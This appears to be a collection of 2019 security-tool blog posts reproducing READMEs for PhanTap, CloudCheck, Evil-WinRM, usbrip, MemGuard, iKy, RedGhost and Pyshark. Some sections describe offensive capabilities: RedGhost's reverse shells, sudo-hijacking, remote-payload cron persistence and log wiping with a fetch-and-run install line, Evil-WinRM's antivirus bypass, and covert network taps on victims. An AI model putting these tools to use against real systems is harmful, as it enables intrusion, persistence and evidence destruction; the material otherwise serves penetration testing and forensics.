  • Get the interface names from that device:
# uci show network | grep ifname
network.loopback.ifname='lo'
network.lan.ifname='eth1'
network.wan.ifname='eth0'
network.wan6.ifname='eth0'

In this example we are using a GL-AR150, which only has 2 interfaces.

Add the interfaces to the phantap bridge via the following commands in the cli (assuming we are using a GL-AR150):
  • uci delete network.lan.ifname
  • uci delete network.wan.ifname
  • uci delete network.wan6.ifname
  • uci set network.phantap.ifname='eth0 eth1'
  • uci commit network
  • /etc/init.d/network reload

PhanTap is now configured; as soon as you plug it between a victim and their switch, it will automatically configure the router and give it Internet access.

You can add your favorite VPN to have a remote connection back. PhanTap has been tested with a VPN on TCP port 443, to avoid some detection methods.

You can also add a command to be run when a new IP or DNS is configured, in /etc/config/phantap, e.g. /etc/init.d/openvpn restart (restart the VPN service).

You can also look at disabling the wifi by default and using hardware buttons to start it (https://openwrt.org/docs/guide-user/hardware/hardware.button).

Limitations or how it can be detected:

  • The GL.iNet GL-AR150 and most inexpensive devices only support 100 Mbps, whereas modern network traffic will be 1 Gbps.
  • The network port will stay up, switch side, when the victim device is disconnected/shut down.
  • There is no re-configuration of PhanTap, so we might use an IP that has been reassigned to another device (roadmap: DHCP).
  • Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).

Roadmap:

  • Add logic to restart the detection when the links go up/down.
  • Add DHCP packet analysis for dynamic reconfiguration.
  • Add IPv6 support.
  • Test limitations of devices that have switches (swconfig) instead of separate interfaces.

Article link

Date of publish: Wed, 07 Aug 2019 20:47:00 +0000

CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible



Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using.

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by Cloudflare in the hopes of discovering the location of the server.

Using Tor to mask all requests, the tool as of right now has 3 different attack phases.
  • Misconfigured DNS scan using DNSDumpster.com.
  • Scan the Crimeflare.com database.
  • Bruteforce scan over 2500 subdomains.

Cloudcheck creates an empty text file called none.txt in the data folder so that it doesn't run a subdomain brute force when testing.

Cloudcheck will automatically change your hosts file, using entries from CloudFail, and test for a specified string to detect whether said entry can be used to bypass Cloudflare.

If the output is "True", you can use the IP address in your hosts file to bypass Cloudflare. (This process will be automated later.)

Download Cloudcheck

Article link

Date of publish: Fri, 02 Aug 2019 17:03:00 +0000

The Ultimate WinRM Shell For Penetration Testing


This shell is the ultimate WinRM shell for hacking/pentesting.


WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems in order to make life easier for system administrators.

This program can be used on any Microsoft Windows server with this feature enabled (usually on port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase.

The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting stuff.

Features

  • Command History
  • WinRM command completion
  • Local files completion
  • Upload and download files
  • List remote machine services
  • FullLanguage Powershell language mode
  • Load Powershell scripts
  • Load DLL files in memory, bypassing some AVs
  • Load C# (C Sharp) compiled exe files in memory, bypassing some AVs
  • Colorization on output messages (can be disabled optionally)

Help

Usage:
evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]

  • -i, --ip IP                      Remote host IP or hostname (required)
  • -P, --port PORT                  Remote host port (default 5985)
  • -u, --user USER                  Username (required)
  • -p, --password PASS              Password
  • -s, --scripts PS_SCRIPTS_PATH    Powershell scripts path (required)
  • -e, --executables EXES_PATH      C# executables path (required)
  • -U, --url URL                    Remote url endpoint (default /wsman)
  • -V, --version                    Show version
  • -h, --help                       Display this help message


Requirements

Ruby 2.3 or higher is needed. Some Ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.

~$ sudo gem install winrm winrm-fs colorize stringio

Installation 

Step 1. Clone the repo: 

git clone https://github.com/Hackplayers/evil-winrm.git

Step 2. Ready. Just launch it!

~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

If you don't want to put the password in clear text, you can omit the -p argument and the password will be prompted for without being shown.

To use IPv6, the address must be added to /etc/hosts.

Alternative installation method as ruby gem

Step 1. Install it: 

gem install evil-winrm

Step 2. Ready. Just launch it!

~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'


Documentation

Basic commands

  • upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
  • usage: upload local_path remote_path
  • download: it is not needed to set local_path if the remote file is in the current directory.
  • usage: download remote_path local_path
  • services: list all services. No administrator permissions needed.
  • menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown.

Load powershell scripts

To load a ps1 file you just have to type the name (auto-completion using tab allowed). The scripts must be in the path set at the -s argument. Type menu again to see the loaded functions.


Advanced commands

Invoke-Binary: allows executables compiled from C# to be executed in memory. The name can be auto-completed using the tab key and allows up to 3 parameters. The executables must be in the path set at the -e argument.

l04d3r-LoadDll: allows loading DLL libraries in memory; it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))

The DLL file can be hosted over SMB, HTTP or locally. Once it is loaded, type menu; then it is possible to autocomplete all functions.




Extra features

To disable colors, edit the $colors_enabled variable in the code and set it to false: $colors_enabled = false


Disclaimer 

Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.

Download Winrm

Article link

Date of publish: Wed, 31 Jul 2019 12:21:00 +0000

USBRIP- Simple Command Live Forensic Tool For Tracking USB device

Simple command line forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.


usbrip (derived from "USB Ripper", not "USB R.I.P.") is an open source forensics tool with a CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.

usbrip is a small piece of software written in pure Python 3 (using some external modules though, see Dependencies/PIP) which parses Linux log files (/var/log/syslog* or /var/log/messages* depending on the distro) for constructing USB event history tables. Such tables may contain the following columns: "Connected" (date & time), "User", "VID" (vendor ID), "PID" (product ID), "Product", "Manufacturer", "Serial Number", "Port" and "Disconnected" (date & time).

Besides, it also can:
  • export gathered information as a JSON dump (and open such dumps, of course);
  • generate a list of authorized (trusted) USB devices as a JSON (call it auth.json);
  • search for "violation events" based on the auth.json: show (or generate another JSON with) USB devices that do appear in history and do NOT appear in the auth.json;
  • when installed with the -s flag, create encrypted storages (7zip archives) to automatically back up and accumulate USB events with the help of the crontab scheduler;
  • search additional details about a specific USB device based on its VID and/or PID.
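To make the two steps described above concrete (parse the syslog kernel lines into "Connected"/"Disconnected" events, then compare the events with a trusted list the way an auth.json is used), here is an added Python example. It is not usbrip's own code; the log lines, the trusted list and every device value in them (vendor, product, serial) are constructed samples in the default syslog format, which has no year in the timestamp.

```python
"""Rebuild a USB event history from syslog-style kernel lines and flag
devices that are not on a trusted list.

Added example, not usbrip's code. The log lines are constructed samples in
the unmodified syslog format; a custom rsyslog/syslog-ng template would
change the line prefix and break LINE_RE, which is the same limitation the
text describes for usbrip itself.
"""
import re

SAMPLE_LOG = """\
Dec  9 10:12:01 host kernel: [  123.456789] usb 1-1: new high-speed USB device number 2 using xhci_hcd
Dec  9 10:12:01 host kernel: [  123.567890] usb 1-1: New USB device found, idVendor=0781, idProduct=5580, bcdDevice= 1.00
Dec  9 10:12:01 host kernel: [  123.567900] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
Dec  9 10:12:01 host kernel: [  123.567910] usb 1-1: Product: Extreme
Dec  9 10:12:01 host kernel: [  123.567920] usb 1-1: Manufacturer: SanDisk
Dec  9 10:12:01 host kernel: [  123.567930] usb 1-1: SerialNumber: AA010203040506
Dec  9 10:15:33 host kernel: [  335.123456] usb 1-1: USB disconnect, device number 2
Dec 10 08:00:10 host kernel: [  900.000000] usb 2-3: New USB device found, idVendor=1234, idProduct=abcd, bcdDevice= 2.00
Dec 10 08:00:10 host kernel: [  900.000010] usb 2-3: Product: BadUSB
Dec 10 08:00:10 host kernel: [  900.000020] usb 2-3: Manufacturer: EvilUSBManufacturer
Dec 10 08:00:10 host kernel: [  900.000030] usb 2-3: SerialNumber: 1234567890
"""

# Syslog prefix (month, day, time, host, "kernel:"), optional printk timestamp,
# then the per-port kernel message.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: "
    r"(?:\[\s*[\d.]+\] )?usb (?P<port>[\d.-]+): (?P<msg>.*)$"
)
FOUND_RE = re.compile(
    r"New USB device found, idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})"
)
ATTR_RE = re.compile(r"^(?P<key>Product|Manufacturer|SerialNumber): (?P<val>.*)$")
ATTR_COLUMN = {"Product": "prod", "Manufacturer": "manufact", "SerialNumber": "serial"}


def parse_events(log_text):
    """Return one dict per device session, in connection order.

    A session opens on "New USB device found" for a port, collects the
    Product/Manufacturer/SerialNumber lines that follow on that port, and
    closes on "USB disconnect"; a device still plugged in has disconn=None.
    """
    events, open_by_port = [], {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, port, msg = m.group("ts"), m.group("port"), m.group("msg")
        found = FOUND_RE.match(msg)
        if found:
            event = {"conn": ts, "port": port, "vid": found["vid"], "pid": found["pid"],
                     "prod": None, "manufact": None, "serial": None, "disconn": None}
            events.append(event)
            open_by_port[port] = event
            continue
        attr = ATTR_RE.match(msg)
        if attr and port in open_by_port:
            open_by_port[port][ATTR_COLUMN[attr["key"]]] = attr["val"]
        elif msg.startswith("USB disconnect") and port in open_by_port:
            open_by_port.pop(port)["disconn"] = ts
    return events


def find_violations(events, trusted, attributes=("vid", "pid")):
    """Events whose selected attributes match no entry of the trusted list.

    `attributes` plays the role of usbrip's -a switch: the tuple of columns
    that must all agree with some trusted entry for a device to be allowed.
    """
    def key(record):
        return tuple(record.get(a) for a in attributes)
    allowed = {key(t) for t in trusted}
    return [e for e in events if key(e) not in allowed]


# Constructed trusted list, the content an auth.json would carry.
TRUSTED = [{"vid": "0781", "pid": "5580"}]

if __name__ == "__main__":
    history = parse_events(SAMPLE_LOG)
    for ev in history:
        print(f"{ev['conn']}  {ev['vid']}:{ev['pid']}  {ev['manufact']} {ev['prod']}  "
              f"serial={ev['serial']}  disconnected={ev['disconn'] or 'still connected'}")
    for ev in find_violations(history, TRUSTED):
        print(f"VIOLATION: {ev['vid']}:{ev['pid']} serial={ev['serial']} on port {ev['port']}")
```

Matching on VID and PID alone, as the sample trusted list does, accepts any device of the same model; adding "serial" to the attributes tuple tightens the check to individual units, at the cost of flagging every device whose trusted entry lacks a serial number.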

Quick Start

usbrip is available for download and installation at PyPI:

$ pip3 install usbrip



Git Clone

For simplicity, let's agree that all commands prefixed with ~/usbrip$ are executed in the ~/usbrip directory, which is created as a result of git clone:

~$ git clone https://github.com/snovvcrash/usbrip.git usbrip && cd usbrip
~/usbrip$

Dependencies

usbrip works with non-modified structure of system log files only, so, unfortunately, it won't be able to parse USB history if you change the format of syslogs (with syslog-ng or rsyslog, for example). That's why the timestamps of "Connected" and "Disconnected" fields don't have the year, by the way. Keep that in mind.

DEB Packages

  • python3.6 (or newer) interpreter
  • python3-venv
  • p7zip-full (used by storages module)
  • ~$ sudo apt install -y python3-venv p7zip-full

PIP Packages

usbrip makes use of the following external modules:
  • terminaltables
  • termcolor

To resolve Python dependencies manually (it's not necessary actually because pip or setup.py can automate the process, see Installation) create a virtual environment (optional) and run pip from within:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install -r requirements.txt

Or let the pipenv one-liner do all the dirty work for you:

~/usbrip$ pipenv install && pipenv shell

After that you can run usbrip portably:

(venv) ~/usbrip$ python -m usbrip -h
Or
(venv) ~/usbrip$ python __main__.py -h

Installation

There are two ways to install usbrip into the system: pip or setup.py.

pip or setup.py

First of all, usbrip is pip installable. This means that after git cloning the repo you can simply fire up the pip installation process and after that run usbrip from anywhere in your terminal like so:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install .

(venv) ~/usbrip$ usbrip -h

Or if you want to resolve Python dependencies locally (without bothering PyPI), use setup.py:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ python setup.py install

(venv) ~/usbrip$ usbrip -h

Note: you'd likely want to run the installation process while the Python virtual environment is active (as shown above).

install.sh

Secondly, usbrip can also be installed into the system with the ./installers/install.sh script.

When using the ./installers/install.sh some extra features become available:
  • the virtual environment is created automatically;
  • the storage module becomes available: you can set a crontab job to backup USB events on a schedule (the example of crontab jobs can be found in usbrip/cron/usbrip.cron).

Warning: if you are using crontab scheduling, configure the cron job with sudo crontab -e in order to force the storage update submodule to run as root as well as to protect the passwords of the USB event storages. The storage passwords are kept in /var/opt/usbrip/usbrip.ini.

The ./installers/uninstall.sh script removes all the installation artifacts from your system.

To install usbrip use:

~/usbrip$ chmod +x ./installers/install.sh
~/usbrip$ sudo -H ./installers/install.sh [-l/--local] [-s/--storages]
~/usbrip$ cd

~$ usbrip -h

  • When -l switch is enabled, Python dependencies are resolved from local .tar packages (./3rdPartyTools/) instead of PyPI.
  • When -s switch is enabled, not only the usbrip project is installed, but also the list of trusted USB devices, history and violations storages are created.

Note: when using -s option during installation, make sure that system logs do contain at least one external USB device entry. It is a necessary condition for usbrip to successfully create the list of trusted devices (and as a result, successfully create the violations storage).

After the installation completes, feel free to remove the usbrip folder.

Paths

When installed, the usbrip uses the following paths:
  • /opt/usbrip/ — project's main directory;
  • /var/opt/usbrip/usbrip.ini — usbrip configuration file: keeps passwords for 7zip storages;
  • /var/opt/usbrip/storage/ — USB event storages: history.7z and violations.7z (created during the installation process);
  • /var/opt/usbrip/log/ — usbrip logs (recommended to log usbrip activity when using crontab, see usbrip/cron/usbrip.cron);
  • /var/opt/usbrip/trusted/ — list of trusted USB devices (created during the installation process);
  • /usr/local/bin/usbrip — symlink to the /opt/usbrip/venv/bin/usbrip script.

cron

Cron jobs can be set as follows:

~/usbrip$ sudo crontab -l > tmpcron && echo "" >> tmpcron
~/usbrip$ cat usbrip/cron/usbrip.cron | tee -a tmpcron
~/usbrip$ sudo crontab tmpcron
~/usbrip$ rm tmpcron

uninstall.sh

To uninstall usbrip use:

~/usbrip$ chmod +x ./installers/uninstall.sh
~/usbrip$ sudo ./installers/uninstall.sh [-a/--all]

When -a switch is enabled, not only the usbrip project directory is deleted, but also all the storages and usbrip logs are deleted too.

And don't forget to remove the cron job.

Usage

Synopsis

# ---------- BANNER ----------

$ usbrip banner
Get usbrip banner.

# ---------- EVENTS ----------

$ usbrip events history [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB event history.

$ usbrip events open <DUMP.JSON> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Open USB event dump.

$ usbrip events gen_auth <OUT_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Generate a list of trusted (authorized) USB devices.

$ usbrip events violations <IN_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB violation events based on the list of trusted devices.

# ---------- STORAGE ----------

$ usbrip storage list <STORAGE_TYPE> [-q] [--debug]
List contents of the selected storage (7zip archive). STORAGE_TYPE is "history" or "violations".

$ usbrip storage open <STORAGE_TYPE> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-q] [--debug]
Open selected storage (7zip archive). Behaves similarly to the EVENTS OPEN submodule.

$ usbrip storage update <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Update storage — add USB events to the existing storage (7zip archive). COMPRESSION_LEVEL is a number in [0..9].

$ usbrip storage create <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Create storage — create 7zip archive and add USB events to it according to the selected options.

$ usbrip storage passwd <STORAGE_TYPE> [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Change password of the existing storage.

# ---------- IDs ----------

$ usbrip ids search [--vid <VID>] [--pid <PID>] [--offline] [-q] [--debug]
Get extra details about a specific USB device by its <VID> and/or <PID> from the USB ID database.

$ usbrip ids download [-q] [--debug]
Update (download) the USB ID database.

Help

To get a list of module names use:

$ usbrip -h

To get a list of submodule names for a specific module use:

$ usbrip <module> -h

To get a list of all switches for a specific submodule use:

$ usbrip <module> <submodule> -h


Examples

Show the event history of all USB devices, suppressing banner output, info messages and user interaction (-q, --quiet), represented as a list (-l, --list) with the latest 100 entries (-n NUMBER, --number NUMBER):

$ usbrip events history -ql -n 100

Show the event history of the external USB devices (-e, --external, which were actually disconnected) represented as a table (-t, --table) containing "Connected", "VID", "PID", "Disconnected" and "Serial Number" columns (-c COLUMN [COLUMN], --column COLUMN [COLUMN]) filtered by date (-d DATE [DATE ...], --date DATE [DATE ...]) with logs taken from the outer files (-f FILE [FILE ...], --file FILE [FILE ...]):

$ usbrip events history -et -c conn vid pid disconn serial -d "Dec  9" "Dec 10" -f /var/log/syslog.1 /var/log/syslog.2.gz

Build the event history of all USB devices and redirect the output to a file for further analysis. When the output stream is NOT a terminal stdout (| or > for example) there will be no ANSI escape characters (color) in the output, so feel free to use it that way. Also notice that usbrip uses some Unicode symbols, so it would be nice to convert the resulting file to UTF-8 encoding (with enconv for example) as well as change newline characters to Windows style for portability (with awk for example):

usbrip events history -t | awk '{ sub("$", "\r"); print }' > usbrip.out && enconv -x UTF8 usbrip.out

Remark: you can always get rid of the escape characters by yourself even if you have already got the output to stdout. To do that just copy the output data to usbrip.out and add one more awk instruction:

awk '{ sub("$", "\r"); gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' usbrip.out && enconv -x UTF8 usbrip.out

Generate a list of trusted USB devices as a JSON-file (trusted/auth.json) with "VID" and "PID" attributes containing the first three devices connected on September 26:

$ usbrip events gen_auth trusted/auth.json -a vid pid -n 3 -d "Sep 26"

Search the event history of the external USB devices for violations based on the list of trusted USB devices (trusted/auth.json) by "PID" attribute, restrict resulting events to those which have "Bob" as a user, "EvilUSBManufacturer" as a manufacturer, "1234567890" as a serial number and represent the output as a table with "Connected", "VID" and "PID" columns:

$ usbrip events violations trusted/auth.json -a pid -et --user Bob --manufact EvilUSBManufacturer --serial 1234567890 -c conn vid pid

Search for details about a specific USB device by its VID (--vid VID) and PID (--pid PID):

$ usbrip ids search --vid 0781 --pid 5580

Download the latest version of usb_ids/usb.ids database (the source is here):

$ usbrip ids download

Download USBrip

Article link

Date of publish: Mon, 29 Jul 2019 07:18:00 +0000

MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory




This package attempts to reduce the likelihood of sensitive data being exposed. It supports all major operating systems and is written in pure Go.

Features


  • Sensitive data is encrypted and authenticated in memory using xSalsa20 and Poly1305 respectively. The scheme also defends against cold-boot attacks.
  • Memory allocation bypasses the language runtime by using system calls to query the kernel for resources directly. This avoids interference from the garbage-collector.
  • Buffers that store plaintext data are fortified with guard pages and canary values to detect spurious accesses and overflows.
  • Effort is taken to prevent sensitive data from touching the disk. This includes locking memory to prevent swapping and handling core dumps.
  • Kernel-level immutability is implemented so that attempted modification of protected regions results in an access violation.
  • Multiple endpoints provide session purging and safe termination capabilities as well as signal handling to prevent remnant data being left behind.
  • Side-channel attacks are mitigated against by making sure that the copying and comparison of data is done in constant-time.
  • Accidental memory leaks are mitigated against by harnessing the garbage-collector to automatically destroy containers that have become unreachable.

Some features were inspired by libsodium, so credits to them.

Full documentation and a complete overview of the API can be found here. Interesting and useful code samples can be found within the examples subpackage.

Installation

$ go get github.com/awnumar/memguard

We strongly encourage you to pin a specific version for a clean and reliable build. This can be accomplished using modules.

Contributing


  • Using the package and identifying points of friction.
  • Reading the source code and looking for improvements.
  • Adding interesting and useful program samples to ./examples.
  • Developing Proof-of-Concept attacks and mitigations.
  • Improving compatibility with more kernels and architectures.
  • Implementing kernel-specific and cpu-specific protections.
  • Writing useful security and crypto libraries that utilise memguard.
  • Submitting performance improvements or benchmarking code.

Issues are for reporting bugs and for discussion on proposals. Pull requests should be made against master.

Future goals


  • Ability to stream data to and from encrypted enclave objects.
  • Catch segmentation faults to wipe memory before crashing.
  • Evaluate and improve the strategies in place, particularly for Coffer objects.
  • Formalise a threat model and evaluate our performance in regards to it.
  • Use lessons learned to apply patches upstream to the Go language and runtime.

Article link

Date of publish: Sun, 28 Jul 2019 13:14:00 +0000

iKy OSINT Project - To Collect Information From E-Mail With GUI


iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline.


Project iKy collects information from an email address and shows the results in a visual interface.

Installation


Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis

wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

And turn on the server in a terminal

redis-server

Python stuff and Celery

You must install the libraries inside requirements.txt
pip install -r requirements.txt

And turn on Celery in another terminal, within the directory backend
./celery.sh

Finally, again, in another terminal turn on backend app from directory backend

python app.py

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the directory frontend install the dependencies

npm install

Turn on Frontend Server

Finally, to run frontend server, execute:

npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded

Video Demo

Article link

Date of publish: Mon, 22 Jul 2019 08:22:00 +0000

RedGhost - Linux Post Exploitation Framework



It is designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.


  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl

  • SudoInject
Function to inject the sudo command with a wrapper function to run a reverse root shell every time "sudo" is run, for privilege escalation

  • lsInject
Function to inject the "ls" command with a wrapper function to run a payload every time "ls" is run, for persistence

  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence

  • GetRoot
Function to try various methods to escalate privileges

  • Clearlogs
Function to clear logs and make investigation with forensics difficult

  • MassInfoGrab
Function to grab mass reconnaissance/information on the system

  • CheckVM
Function to check if the system is a virtual machine

  • MemoryExec
Function to execute remote bash script in memory

  • BanIp
Function to BanIp using iptables

Installation

Install RedGhost in one line code:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh

One line code to Install prerequisites and RedGhost :

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-g

Download Redghost

Article link

Date of publish: Fri, 19 Jul 2019 08:30:00 +0000

Pyshark - Allowing Python Packet Parsing Using Wireshark Dissectors


Python wrapper for tshark, allowing python packet parsing using Wireshark dissectors.


Pyshark features a few "Capture" objects (Live, Remote, File, InMem). Each of these reads from its respective source and can then be used as an iterator to get its packets. Each capture object can also receive various filters so that only some of the incoming packets will be saved.

Installation

All Platforms

Simply run the following to install the latest from pypi

pip install pyshark

Or install from the git repository:

git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install

Mac OS X

You may have to install libxml, which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:

xcode-select --install
pip install libxml

You will probably have to accept an EULA for XCode, so be ready to click an "Accept" dialog in the GUI.

Usage

Reading from a capture file:

>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
<FileCapture /tmp/mycapture.cap (589 packets)>
>>> print(cap[0])
Packet (Length: 698)
Layer ETH:
        Destination: BLANKED
        Source: BLANKED
        Type: IP (0x0800)
Layer IP:
        Version: 4
        Header Length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
        Total Length: 684
        Identification: 0x254f (9551)
        Flags: 0x00
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (17)
        Header checksum: 0xe148 [correct]
        Source: BLANKED
        Destination: BLANKED
  ...

Other options

  • param keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
  • param input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
  • param display_filter: A display (wireshark) filter to apply on the cap before reading it.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary.

Reading from a live interface:

>>> capture = pyshark.LiveCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print('Just arrived:', packet)

Other options
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live interface using a ring buffer

>>> capture = pyshark.LiveRingCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print('Just arrived:', packet)

Other options
  • param ring_file_size: Size of the ring file in kB, default is 1024
  • param num_ring_files: Number of ring files to keep, default is 1
  • param ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live remote interface:

>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')
